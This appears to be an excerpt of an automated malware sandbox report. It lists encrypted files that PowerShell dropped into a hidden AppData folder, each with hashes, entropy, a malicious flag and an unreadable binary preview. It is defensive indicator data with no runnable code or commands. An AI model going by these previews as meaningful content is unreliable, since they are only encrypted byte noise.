Preview:	.l-l.2...?.I.k.......[........Ke.H.p..`H{..ZR..r0..S.]-N.w.w....^.l.fP.5.....R.Oi.`...l"+E..i.....;...x...F.C......L..fd:..LG.......d.n~......p.U.........m....YR.{...Y...9.j.n.._(.\C....!f.........(uVt...V..;5....oK..7-....`S.f...y~7./.G+......4bG...F.t...$.{...Yw.7l.l...>wt.hu.].G..2....g.....{)J...m0D...._.g.....D.s./...QY`..?*"f.(.....S(.3Y.4Sf..>.i.....R.....D....%V%.9..g.%..XZ........).>...y..]...0..j-3-.........[..w.....S.......RR.h...".h".-..2.X.)..nP.;N.....wT.'...V..&.C.Ic....v._s.)Px4...b.bo.........R^{....p.@.B..R.............ZJ.....Z.....!...F.:....qb.....B.5.>.=.\|.2.-.\|..O......SgAU....NI;.;.F>I.....{M7k.O!x..;.....2.g..O.H...r.s.....<../....-.V..C"gY...9..........c8o7\........../..i.Jr.....;.._.z...IG=/P...,G.$.>.xl..D.Y.J(.)lS[.....Bo....Q...O. ..gRT.?.u...^..<e@}.2..m...........Q.mL.w(.i%...]gU}.&....\.`..uy.TU.H..ct..Gs..YN......W......W.$.i...].n...Z.......j..:.JM.b....."Dp..M...5..H'......+...p.w'.,.r...o..\|._...L

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GBcjDUifud.OxVZwkPCdBRiXFcqUo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	92252
Entropy (8bit):	7.998123042324979
Encrypted:	true
SSDEEP:	1536:Px8M6CtfHyAxgLZk4pXRIcN2An0p8W2kGkO4d6IPcr5rn2wNyQg6Ka2zfhVBLik0:J8MZfSWgLZv7zlxWnQrhn7fg6KaUvBLy
MD5:	EB5B2571C5F14C65A3CA3C350B984CBE
SHA1:	807E2A69EDFA836FCD3419D7C9DE4085563896F5
SHA-256:	30F2FE44E87544DFD7A9A0D9D6416DE30F3B550E4393098D537927E59CDC0AC6
SHA-512:	A11FACEA673FFB065F67C4C978D6125B40E9F3EB65C64BB681FD4AAB0F4718287591E6E53888E5EED3DD6BD613B529F25F7F6ACF2AC02F36FC0310D0DD8E6578
Malicious:	true
Reputation:	unknown
Preview:	.1........6.....0v.7....#.......3.....\.#.B..tG...:.X......6..'.r.Q.....+{Q....\..sd,.s,..+.Gw...........>,.GXK._....s..$....W...}.s.f.u....d.43...X.......g.x.....Q.<...+?^V....].%...zet.5J]..u>%`.q......U{..:........r~....x.w.....Q..t.......D.s.q.2.\|..._K...=..~D..@..z...O.3...C]...g0U.B..P.....x.1......_.,^....ON...b....Gl..1m..:.../..+...f....P....i.....a....GvU..9.%C.lx.z..d._.....b9h0.7%E.X.{ks..b....6.3j...O.7,..2.....z&.l[....IL.d..+Y5..9+..!...@&Es....Ds.Q.....q...o.(..N0@Ki63......:...^t.,M.)..89..K..E..(n..]...c... .<....A..>..v=X.[..Z..X@.d.zL....,n..4Cc./...".0.U<.L[..T.N#.r]........0.\s.AXE..3.`"<.^..N>.aZ...,c..^C...H...D.9.>....L.....`..,.d...=.q...5.....r.9.w..../...'.i../\|..H..J.Y5..'.]...8...j..........^......32.._......oCr.L....OH:9..c...*.~O.k^..T_.5'[.RiM.N@.j..VQ....:.."A.!......^..b3...d....rvEmN}../'l.3..{J.D.{.v2.....#,..3...%.:..H1.....m..`....:q....tk..=.Id.A...x.......E.I<....p.%.q..... ..>.AXkD. ...Y.M...cz

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GLkArebBzPJ.aHbVgKEWAMQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	104096
Entropy (8bit):	7.998186155255266
Encrypted:	true
SSDEEP:	3072:xZ96cKiO2OybjwVpaNXUAHy81htqY9MlWmNnZ:PkhiXZjwVpoNy8oYG0mD
MD5:	8189D49DF665E0847091FC7266D3636B
SHA1:	C68DD33DF101D2B3A74241DDC0B4118073BBFDEC
SHA-256:	F3D43D8F07495AAEE0004E77819C99689DE47CB6F5A10252669EA1929D5CB885
SHA-512:	9882F052A0CDA3A8A282330AE955C834E6959CB107CB8E801795E0C841EA6723694FB6994BE4AE81D125C1E2370B98AEB4B16DB92C96917247C826F15D977ABB
Malicious:	true
Reputation:	unknown
Preview:	..7.:.m.Y._A..F......6.eU{.~.......[I....C+BN...V...\|.....g.$...5..hs.:."..1.6m...M.......j.Y.j.w......A.}...\.O.....&%...xB..;....j%."+S..2.....h+..lP.....mq;A0.x.s)....&.2..w.j....ip.."#....Z.W.v .....Q-...2\.I9.....`...S. .....J>iCh......F..S.7>V...I..O...Cl.....m....lDH.B...T...Rte......{.W...3....]....4........3..E..,T.n]0T..!.! j...u.r... De@.IZ..........Uf..Bo..c...c..M....\|......g....r)..R"..r...{XE.D...k.6..a.o...k....B......V.#......\|.o..F...g.@}......%T6<.PK..=.X..<J..y.......O.'.=...5ER.....U..'A..._.H...M\|..~%..Yy.....O...9..(d...x.o....Z.."..s~@.9.8..za?.ll..B.qwj...hd...?..].bCz*.\|...D.2.a..4.8..U../v..:.l+...].......S1)A.p.;%.v..Y....Iq.....A..h.x.}.M....1....&...j.i...l.N..T.u....@.e..............W.?Z...o..R..V6.XB.2....w.2...xg..w...p..s......\|.v....U...K..v...U..1mq.\#.. c.mhk.._.9!...%.\..w....K.....zbol~..I.....>Ym.?...,z....K..................)..[l.emB...+..S.."....$>.#.._..^..r8G.YQ@...j.2.<C..+Q..7-^Av..)E7.9...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GTzfBLHUSKn.ocfUguEeizYQqZmKX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	164181
Entropy (8bit):	7.998856887411964
Encrypted:	true
SSDEEP:	3072:jHwoGKlWQpJTQb4t0fV06ysJ35pI0Elrs6Rlfb7EwIrlj9UV71RoroXAhTSy:xWQ+4yfv7J3wPlvRxbQwCsTtXAF
MD5:	96B4AEF888AE674A5D523D9DF5FAD494
SHA1:	EF5AEA90E31F8C76FF1B5202F79F135AB0491A29
SHA-256:	5465D04DFCA0B0665F108D02E114E37F43C5E38BC3B92E39EADC816E250AC30E
SHA-512:	D4C32A6873626DAA4A109F5C4194207BAE0F4D52E225AB3A7A50A560B19943C029A95AEB6517CAD20AE7C6453E4F4DC1C15FB416DD6AF2AB4BF1B6C8954930AE
Malicious:	true
Reputation:	unknown
Preview:	..vV..5.W.F..G\...~.0.D...+...k.s.m.?...;..B..<..j.VG.K2..p..\H...7.W@......C.c....G....;.5....g+...X.}v.r....^Y....Xr.x......"..Q...y\.6.$.R>..^....9.......a..O...nE.C..oN.&.Y,...&9...:.Zk..3vy...[...s~JC.R.Y.%.)wb"Y......;.q..s...m..M.F...)..P).......V..k.4.#..l..3.....e.-2 \....p.?f..S.....x..{J.P....8a..s....0@.. ..tO6..g..;.SD.....^-b.s>t...d7.ZZJ'..9T...f:.v...6........(.@e.......\....a.T.v.#g.5.}.4.3.HdNn@x.d._,...3....HF5'A.LL..MC(..i;.!..}z...U..C.:.e.<...+.....l-..K.....nJ...*....={.--..^..L..dp>./.9..X...E4...T./.a..QT.&.n.<Z=.K.Y....]_j..)..R-5..C..........{..K.....<..kx[o.u.$...r\|.9.SrX...K.Z.......0N...#.x...w............m.......K..Z6O.jBX.....F.lG".e.S.5.....t.....HA.f.1.<....'..........cq^...>$....._-......~.'..F.....J.5.. ......P0^....2...Sh.>.]....M...#...,.....q..}.7...s...%W.........J..c.....lz.`..n...1.....K...:2.jW. ......"0..Pm.J..k(.E.H....f.mA";j...z#.....K.W..p..B..Um...v..c....b.H=..t_^b...$T..r.........nzU.g.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GoZrhXvmKqjDgOFbLJC.YjXregzImwALOMqiHTN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	63622
Entropy (8bit):	7.997069159873588
Encrypted:	true
SSDEEP:	1536:yRGdiUXHmeQxcS0HHju8G0FUTyH21DIkWD63Y2Yxpa5grn:yRGQtsLnmTyWGkE6o2YLak
MD5:	B8A548FCE3C8D503D7F516EB848FF285
SHA1:	48D43CF92CB1D34403EE92B3B64D43A55FE0BEAE
SHA-256:	94282D82E9B15ACB7F90A8F355CA02A4DF6822535B7C46FB95B51FCBE122A98F
SHA-512:	D541EAEC907BE590184E3E00CD137F5CD107B4E60F31677A722F869D59B19F5CD81ECAEBDE52D5FD473FFF18A4E83D0CD9BCCD48933CE1F94AFCB216C2B97C0C
Malicious:	true
Reputation:	unknown
Preview:	.....hpv.5..W..B.;.Z.\|......-...0.Ki.._..gx..BC.ha.n.[Hc&...v.H.b.......K./.O....Y.{d#.h.C..fE...9.}.'.z...._. D3dT\|e...<.F.\u...l..H(.z...MP.m.x2.1<3.`V............y.]d+W..H.\.B$vo:.j...h...H...{'g.D....s..Z;.o.....CC....vb.,Cg...+n..S. ........8.OJ.y..Z.....JlJ..v.`....7..eC/7;..$/...+....._D..v.. .hn..../..v/.&.t.k5K.....F..mB.Bt.2w.]%0.^0.k.....ygw..,<t.5FZ..p..............a.0..N...{l. .I.C....D.^.....R0aw:.8!!...G ....ed.......J.7..J.q.&...v...o~>....E..\|w..X".c.$5......Z....u.zB.]..~..no#..u;.9.).E..x..{...$..Wku.~..TG.NrN...t.js..p7...n.f..?...R...i.#) ....1Z5.F.=c.}/...2Dq.....[M...#.?.._.r...S%.9l.X..Ky...@.+../c.Z.E..3(...i....w...n......(..W.'.Zb.y..(mu.[.b..P.....paI...xs."v..NL..E....p,.O..O...z.3.e...9x........Xp..!\|..$.='..........I\|.R.../..-.....a...'.Q.n./.N...Cx\|\|6.<..i........~8.N[..m..\.BN.7..7..L...P......m...Q.E....._..i....N..K\|C...\..\g.Do.....S......(.!~T..\..,.0q,.q....S......y...?4.....&.V..?y.'...B..I`{.?.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HAxTXpsGnEblfijKeLI.rlYvwjxUGHC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	177914
Entropy (8bit):	7.998846217717578
Encrypted:	true
SSDEEP:	3072:U0p4XusoyymuzxSieOicorIzlVxPn3v2HwSntRnCFb4lJ1iY+6fCrGYfbmcHkAa2:v6usoyy9lSielcorIpV13vlSnthC2lJ+
MD5:	22EAC932338E3293AC575C50096345CD
SHA1:	BC505AD54696DE1C27742EC881C46B7EFD842C58
SHA-256:	CB0D08B886648D6C805EF9FF567907C4E82024C4F0BAFFD2F10170E5CBD96D66
SHA-512:	129AC9B0CF46AACC2F349E6E4ABC00B0C0E8E639A563027301CE2E50446EEC010ECC5545AF44FEA0EE8A25BA6228011CD269345D3C352EC8B0EB112515F426D2
Malicious:	true
Reputation:	unknown
Preview:	b.....z..84..8.a.t3Ng(.;....../.4.:%..".;.m..9..A./W@..).....c.....;7..c...6Bb.V.I$.L.^s.T...!Xi.).......f..A....?....4@..\|T....Q8.__?..X.....+..jP.d4.Z.~'%..w..%.eA$"."#d..k7...{.i..>....?.....".xeG..A.{+WGWp...@....@y....S..Ic<..'L1.E..._."..'O.u..F.]#.....r......B.......+]..5u..(..{....nk?.....a..Y....M...U..].k.....\lT..YN..........f....f.k...a...=..0.Gs..n....(!.5..ix.(.4.r.,........:\|v...;.@.Xj!.;.`..?.<s......t.. [H...K..j1..f....L.~T.....".B$.MBJ.qO.}D.E......Mk'F...J.M.).Ee....[..;....{.>.........&l7\|...;..^..X..X....Wh.........w._R....N.f.....L...F........dv....u..L=...!..o..t.4......&k ....nE.f.e.!......n.B..7..n.....1CI..:...UC..#..(. .P..Fw..9...(^[i..G.@Ju.ATQ...q.r...I..WK.[..j..t`_S..8.."..Q.Z......}g<..sb.....B..F.kK..'N...D.2~........\..1KAI....F.V...6.."hh.bv....c.....U..]....f\...b...x:.CK........H..v^'.omf.j..V... ...g._..C....a...h..!...G...sx[.o.u.4.SU.+.G...A.D.Uq.{.:.?.I.LN.T.Qs.Q.u.\E.pM..2.....oF....f.ax.E51

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HCZtzBgSEKUIxy.pFsTynBxcaSUEqzQLvh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	54371
Entropy (8bit):	7.996750518595606
Encrypted:	true
SSDEEP:	1536:JjPihcQSm6GCY/Gv5H4YeTmKfgI8GpKDvA0h:JihcQSTGCY/m5HKTbfgRGp90h
MD5:	3856060BB666CD5D565EC313339ED06E
SHA1:	56204CB208C1F2607538B829E0EC69CAB3B6D393
SHA-256:	BF9EA9321DE73C84114230DD8DE90CE4A7F7F661686AF843802050EFA9011851
SHA-512:	F62852D7BF59B6365F1E769E14462B30803AA2EA91D42B8727D66AC68B9DE0986C503CD63E68A96DE8E24A92062BB522939E187CA4FD3C320DBBF7DB90DE5D9D
Malicious:	true
Reputation:	unknown
Preview:	Y..B....n.X......UW0.S$.z....c...r....\2.$.,'JESh.t..l..VN...j....HX.....;/..w/......Vd....D.G<.~A..=\|(...1e...gY.......{/k...\|...@5-.r..:..2vF...wO...q....a.=r.U.:........3&..\|..~..`d..Cv.....G]b..6B..ll$........+'(.Q.m..8...i..m.....@..s.46..,2;.%.q..l...+..`.7..3.!a..6..!0...7......U..m..(.6..........)..p+o..\|.......C\..^....&R..VG...n.....S\|..ZR.(..E..........(...........n.....U7..3...z.c.%..D.K.V...F.....#.6...Y,./;;...r.;..5.C..yf.....1.r...'.i$.v%....B.7F......]eX[.?A.$A.!H.x....s...WdY.%...._.R..A7...!}`.G...0..]A.B.U.d.}..:f.O....{.5..1.UQ.sE-....Q..N(I..T..8<I(X..5.[.$.J.....D.1Pgy.R.S......J.a....di......u:I...lH.s;.Hq.-....\|1.:.....>=.d.w..)....'.......s.8..M.=.U.P6@...L..?#6c......C.'.!+5mgJ...Q3.z.....A4...\xL....)l.x....L%..z........m......w.3..[}.p..Y....H..jU1C.ND{..&Q...p_........4.0Y......../...#3....q5.nO.:7.)..(K..qk./...o.o.X..0u.$.F.N...........@.....c..`^...x.+.R...-*Y9.a..]...xF3E.j.r.-.....V.,.-Ut.).i

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HFtjDvUoNScdVEKi.QsBTLprfiEycUwVC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98090
Entropy (8bit):	7.998227120610227
Encrypted:	true
SSDEEP:	1536:GLRmnwkpyynELPQRG9tWiBWZpqPsrR1sAJ3zFRZJwGOfJQRsq62LnZFdMu7uRVIM:ymnJYyElrWi4ZUmRrJ3DvwGOfJQRsqZO
MD5:	EB3ADCC97308F6F252A757B040A21D01
SHA1:	8C637643AB069A2CA35D97DA5505D6FC4C791F3D
SHA-256:	4331DCB2729F3308BD143773384DE957220F379345883BB8AF33EBCC8005A338
SHA-512:	31C2E79F9E83BA4CF733840AFD1046D3D60A1CC20BB6935F4E956232CAE904A8788F7E0C862AF51DB4308599E4737408981E8D9507D4B63181EF24D4C40181B5
Malicious:	true
Reputation:	unknown
Preview:	b."O_D..7..c.N>..)..%d.T..`#i.F.,..Wx...BM...2E5...^.H.R\|..kW.&..4U...f."X.6...4.x...............VS..Z...N....6p8........:.z7..J.0..Zqm.?...a...zc....:_.i~.I.4\|...X......].R?...W r.K.......z...u...%1..3...>....\_.:^....M?.A..... ..A.?.~.........;h....+...YTt)...a.0..Z...}E...8..H.;m.3s...?_Q.^.X@.^...._?.>p..oH.............Y"P.M....h.4...iX...j.[.......k.b..;...T./.)R..j&La.......x(....h..c.-..\N.:.1g..../X..c`../]cMn...2.l..L...~.S,.V........w....d.'p.e.,.)....b.N..Rd ..G...g..}...{.)'..n.......$..g....0\RVz.)o2..X.A.+.[B.J..l...lK.".]g..J...".......}/...c.WA..G\.u..V.......j...g..h..4.'.,....8.N...X.......S~.Q.X...f.p.75.......\|\..u.<....L....nd..).), ..1pT..J....Ht....m..9<.5Y...b2....p.%...}..&..[.x..4...R..`A....X.....G...m.i..(.v........#........t.K.'L......Lz.......d)....AW..9..p...8..^+3&..1..:...1!,Hu......\|Kv,+A..^#....Q..C...4.N..S&.K.;.:...~.E.+#~.#^..,.......h.}c.zr....Z[4+N..*'./.$>..F.#.&b..@.Ep....S.&......^.8.Y$..+L..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HXbuCBfVQgsWv.aFDROxYrBKZwqUvpk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	66272
Entropy (8bit):	7.997128538437135
Encrypted:	true
SSDEEP:	1536:+j7XVXyP1b7n0ZQLlKEOjWHgsips9WvdxXvB2YySzSPRBTS:+HFX01br0lEuWCpswvfQb9PRpS
MD5:	B2EA9AE10A9EBC8E25C546B362477B21
SHA1:	00297B164942EECD16DE811818EDE7528487FEBE
SHA-256:	7FFF2AD6B3833B943851F518170619CF4FE382C6D5107FB83028F83612810B17
SHA-512:	6FEF7E402A35DF3A7EBD78266F586DA0B448B0ADAE48F9A4F1542F3719F8C379434F5AE3C18D5B14DAAAC75ECE10EA6A2CFE24E1CAF45E4BD9B36F051E9CED9A
Malicious:	true
Reputation:	unknown
Preview:	....D....Y.c..E..by..}.M..m.k..B~ ...Q[..`....dX.....g....nT. ,..C.(nck.6u.xrA..M....e.!..>..is.!.[U".Ln.o0>. e,..`...$.Zlp.$.....V..\|..:>7.4.....;...GC..../aI.ub;;.F..^@..b.^...qI.(..3#..~..&..o..{.5.W{...`KWV.6.,....p#."4.K.[.@..PG;.l..w..5.'B..~2[&....d"...-...KF.dj2f$>.`Or.C...^.e.E..\J..[~.....!.....DGa.../!Pq%gV.P...W.Gm$.0G...].c..Wj4..9...\|...H..D....<d.jrH..5.:.............M=..D..'.}..N..m.yJ...cd..I...R9.5...J..{..e...q~O.aS.._........{.8.E.7......^.rn.....d.w.4....P......i)V.....jM.!..<.uv.....!.......P.s......2.....&..2;.&8.5.1..=.>..<......X......Z...;Ko..Mn.j4.G...8[.X$.M1=...8.9....Ua...)r.#F.._..y.0p\|..1BH.cqv..3~./........'~5.kzr....</`x....(Kr......mu. .;..p...u....VX.4....}.u.}....1.E.WV.....#.Nj..AL]%.g..e.D.\aO........F..CZ.'M...X..d..P.j.y.R.3.X..c......Qh..t...M4.?.1.[O.......,.G(....i..[w}N$..t..,_F..p..;/.O....O/.I.C.`c=....(2.I.x..$.-.!.Y.7Y.%O....t..0]L.&.Y.>. .H.-!..o.........^["...2K.njPK.R.EX..m.....MYm...n

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HhlkFjgTMN.rqmRKZUAWwpiQLHF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194667
Entropy (8bit):	7.999094871036951
Encrypted:	true
SSDEEP:	3072:i5JuGEEPqL/fR3FX/N7qzK9jOmMujAdi+8iU20xwX2JVk8CeBxL5Jle1HdFJwrxD:0JlyL/rvN7qzKNFMusdwiU2S8rjuJeOt
MD5:	DB954303A759C9408113F9EB3313634F
SHA1:	7964086FDA090A4D88D43AE160C57B509D2862FF
SHA-256:	8626FB1FD2D487047B3AA70D0A2F0534A54F9F08540D6160F9EC8DF23F4E86D8
SHA-512:	244AF6F789371DC730A62AF1F63855EF2F7F816E5D5BB031AABB50E313ED149051C64015FD9263BAACECC062C730E2CF5B7C87F87516D080DD4ECEB36C3AD7E6
Malicious:	true
Reputation:	unknown
Preview:	gaM..rn.!3....h..Wf>. .\.\b...O.j.=.05'6.......AT...@......:j3o`J9.">...`.?.R.s.6..Z.....B.2x...r.M.....A..V....8......#.cPn.lC.X..[......H..;.T.G..S.."Slfn.j..<N...B.@..^$g.z~.$....(...0EJ....[w..P....X..W..oEc.6pq83....B.[.'...]_..&!L...YZb.M.}.>..=,.t..B0......EIO..:]..D`. .4..`"........p..I.C3.RA.....I "..!...p.XI\|u..>....w.v.a..Q..Y.f!.O.)h..A..o.WWS2.E...5&...{G..q..vh....Xm.....&^!..........2z..{...:3.=TM..$...4.^.7.e..V.^U.^..~.....Me=...ioN...4D..{..vG..`...'......s..R......:.M'..i.}..3..&V. .rU....#W...P_k.h.....T..@h.6.YL...w ..E.....W\|.O'R....D.._<i!...`?.S..&...q?\.b.......O.X}......._^H,c:.e.jN.b:H..z!..g..r.X.oh.....o.g..E{../.ySQj....[...E.FdE.UP..........x.{.......M..UufA...\...x.19..k.P.x_..S.l!+g)i.p.;. .dUVf.(~y%.J%......R.LF...ucu.m/.Y#.F+(......W/....Gh...]........+b..o[._..)...E.jNU.t...d...L.@.>+..h0...ad.X..jED...G...[..7....zx....Q......\|Zr...Ut.P.%`....`..L.D&.L...*h.8.0.1.o..RS.9N..../.r....A....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HxquFgyDwYAQJzr.HbdNoeGjmKT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	50574
Entropy (8bit):	7.996705437479922
Encrypted:	true
SSDEEP:	1536:rWSovMUPNT3IGrcQV4CIGKs3X81qEsr8rWRjW:doxPl3IB+Ij0XSo8yM
MD5:	ADEF5860A1B304359E9130201E994C2D
SHA1:	65FF62D32F336466E9F0EB3D3EAC0313367124C6
SHA-256:	B43F3359136F9FD85FE983528B33FCAD76E1F0B424314093647468D983F5FABF
SHA-512:	F05CB31350A6A42672E8C3E0FF5D5086217562A1CF3EC3A1BAE433B864FD3D932844C71E22DEBB6A749036354E6C412349C4637D182F682B79CD020360BC0D2F
Malicious:	true
Reputation:	unknown
Preview:	e..\..........f...G.).i..^]0.j.7.:...]A.&c'....})..~;=.E..!e.xp....+.!...h..Y.........S.B;...20.l.<...V.'...q}.N.G\|......M..f&s....S.(.s..#.<v.`V........t..#.Zs..l.uT.....}.sI)}......U...r.......s..F...m...~.t.b..R2.....n6..fUZ.g........_....f.'....!)......I$......7I..l1....N.?..TQ...%RJ0.1..J.j.E.jQ.Q...!.....eI.......t.;.J=.;../ImC......R..B.j.U_.s..R.\|yg...X.L....P..@......;..4......@G...{...r..U..1E........q#...]7....E.bOt.m?..#..}t...\}v...s.5..b.u.b..ZG..]i.\M...hsJ{..W?bX.......\|}..> .&W...(,+.W....,.kl...)...Q...u.K....f.u.[..q...:...D.......Gt.L. f..'.S.N.....Vi..`..]}.....(.....'.....o_j............Z.%e..6-.1/.6>........"=...[...>..,....V....\.H......U..H..41\.n..J.g..`.u\|...vV..iA..1..kY.u.Q.A7+X9^...Z@j.;-d.M.\.9.e..c). #....K.u.Q.U}.y:0+..W.Gb....Wb...9.........6.:....7.T..d......N...C....m.Jh..vB....\|.Ip.X..q..M..x.0.'.5.~.S..V..m. .m..c.....\.w...K.p...E.......y.....%..9."..i..O-.FFK..]...%.....&`..\...)iw....O3.R.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HzjGFEaWXANUlhi.nOgbPVBRLoK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	75101
Entropy (8bit):	7.997401559157013
Encrypted:	true
SSDEEP:	1536:f1FJ9q51wTzmC83/NFXZGX3p8dMlZEkdXbUF03fujYaYK8xazr:tFJo5qTzmC83DZGHXlZEO2Ma+8r
MD5:	95D68F95B716443C0EBE20567236A930
SHA1:	03558ECA858593A93A0B6AB7CF72A4DE3A51C851
SHA-256:	16A5FFE1167E2E03F31B0C245C5452773D5714315A852ABB074B307A0A709E53
SHA-512:	1384005FE4E13729A1EB3878F803FFBF28BCFD473C2BAE12C44DE82FF36C37B82B1960DFD451C4845DCBB4A69F88BBD8C349878013E02D898A129CDE5A5313CB
Malicious:	true
Reputation:	unknown
Preview:	.4.........hoD_r5O./......./9...N..n...3.$.......no(&1....iO.......g.jXO..@,.O..T..Z..<.o[.ua.'....}a...'....:.....`;...r?.....]DG...!-D.xtJ.d ..f.cn.....".rE.....W.$..{..if....7h..F......z..p...j.B..Q.qK..G...Q2%.....Y..I.....<.xK....j.%..Bc..K..2............\t=.g.7.41........>..........d..,.B1..).......q.o._.g.Pv h..W............Vnl.&2o5.MQ....}Z.:....%m..:...I........7....-..(...qc.n.!...p7{8..9..8R:....QCY..._e....e.~......xx.w......_h.r....yo.]D..Ta..7tmn...<.........og2...jfh....<U%....o.b...@q...=8...^.\|...x.f.........1..P..E..l.p~.W[.Y..g5n{...k."..$..v...?.h..fAW.........9...N..3f...T.'...~fh.\.....^7....h.u.5.......`.P.]7...K.....%.J..!...Xw.X.9px8..G....c~\y.s..A...?.s.\|.Y.L..K3b;..;w."...C..8z.....tf......J........l......AWd.iq&w6.uo..6.2..*z..z.v..x...D@....;...R.a..Z$.X.........naNBK.,.C..-...w.A...x.N.R..B...].z.y<F.ADf.veLY .m....u..k.x....0&..dM...4...z.Z.dkrN...w...?CM.F?.9..h........~..b.l....4T`s.89.;S!....~.,..i..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\IWELGeqgpsAMPijX.uDkVyZzQwegiG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	174259
Entropy (8bit):	7.999026477853163
Encrypted:	true
SSDEEP:	3072:Q+0eBko31E/tHGzEVzPvsIga/j9pd0TS4YA30bDWAMOw/t1Y3+eSxdXwH0:ZB21G4Bxv93qS4j0byhOw/83SjwU
MD5:	D731033EBAD56CFB1F66CB483E41BBD5
SHA1:	4013BAB9E3679FC3B4FD0168245EABFE977C5755
SHA-256:	78E5DD73E80714337E6456255F3521DDA7AB4A9171B82866AE2296E55DE39383
SHA-512:	0E311DC73D96B9259C065DD7DDC087943E05BB0CDD00651C79C871B249BE77F5F026EFE71FE34A8D36738F1DE1CE4FE5BDC09AC5A68CA6D420310A972AEAF910
Malicious:	true
Reputation:	unknown
Preview:	...Z...6b..'.!.j..r...'......+...Au..'.......ntg. 8....3.,....9;.........+..pX..8.e\.:......F.....^..z.... ..)...n......,......h...9e8..O.^f\|.d...H....+b.a..Y..i..36-#.0F).6...&m~yA,.j..-........zq..Kb......}.Y.&.<(oW(.c._........c...?...}.p.>2....{#I.g....j..I^vx.s.U...1.p....4\|..HFK.K;...y..=CK...9..x...........1m..oZa.EF..-.I.a..x...E......4...5bs.b2..s..R.].3...g..H.w.d.[..s.+IF..;...&.<2....w;6a.+F%..q..2 Dh...mX....=TE..UZ.]8...Y..C=R...o.m..A.b.......=A..k.X.8..%n.[f9VJpL..>.Tg.,g...(...2...a4.a........\|.ON...6\|z.u.?F.Ic..aY....?.X...JiX..l@k...c.q...9$..!#.z...p#.".......h...T,k.q.....(Ft.H.).Cv.A.....-.Lsd.BMN.f..U%'}.y.?C..jH..w....lS......d.-.q...Nwf.s.Pw.....!.q......"D....5..Q.*B.h.....$..XH....~.....XD.6.]../..W...D{ (.Nh.\|......].8R..p8XO..6..Fh.:8..+..E=C.....<^g.f[...K.N.\D.c.qV.y.b;.,P.d.y_.P.{.-&...\|..)/..I...h+......ix...Y.).f.....-&.N$/C!..5O-O......g.Ki....[..k.ot..%W4...e..^....b!.,.+....Q..G...a)&.....E........

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\IpwGhCnVEmKNs.FafghKUwOuzkqLDjWo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	89632
Entropy (8bit):	7.997641748727779
Encrypted:	true
SSDEEP:	1536:d40imxcN602e/ewx+G+NV3oJdb3NY6jMAEkyV+jOMHQw1pJNQGNn87IFNxhgnJyJ:smxcN60t2wSV3UbdoVWOAvxNQv7+Dgn+
MD5:	55B9ED1645C44781108CFAA41105C77B
SHA1:	83D850263E4D7DB1E6235B4F4EE785388C18CF79
SHA-256:	91EFC8AF23A85E4BB229CA9C75776C5540B9A2EF613DE3E067F9175DC38B4310
SHA-512:	596890C772CEDD26D2B2F1D10DADFE9A3536C556E29A6085C09CBC0BD2BE5163BB05291729983913761DCE8B5E9B58A3C8CDE11FF26E3BE3FEAF6E4CD19FFE18
Malicious:	true
Reputation:	unknown
Preview:	\...+wd.&...Q..N..i....F.2.'....Qtk..........%~.k\|.e....\|2....1k.X ......00.9...w.4.X.w..D.......z.^.UpU.^.....%..Q....5...@1A.i?.c>.o...5...h.DS....:....Gt.../.H#...$..".....y....;.(...aEd .!\|.D.M................R....A..3.-xi..c..(6...ZZ.i{...+:I.q.....?.i./].w....P\|.4!Y ..> .-.q7.M....{.u."[..^D!8.g..tAgO....[..........TW .J.u..7.eKX.\|k=....O.:k...R.A.../M..S...Z.\..L.F..T..$.......$.kyM.....J.?B{....ze...^)t.....5>.Q/.s17.t....Bj.......D...cV@.=.".\\._....G..o.ZR.. .c:..=2..P.Vu.H...4-A. 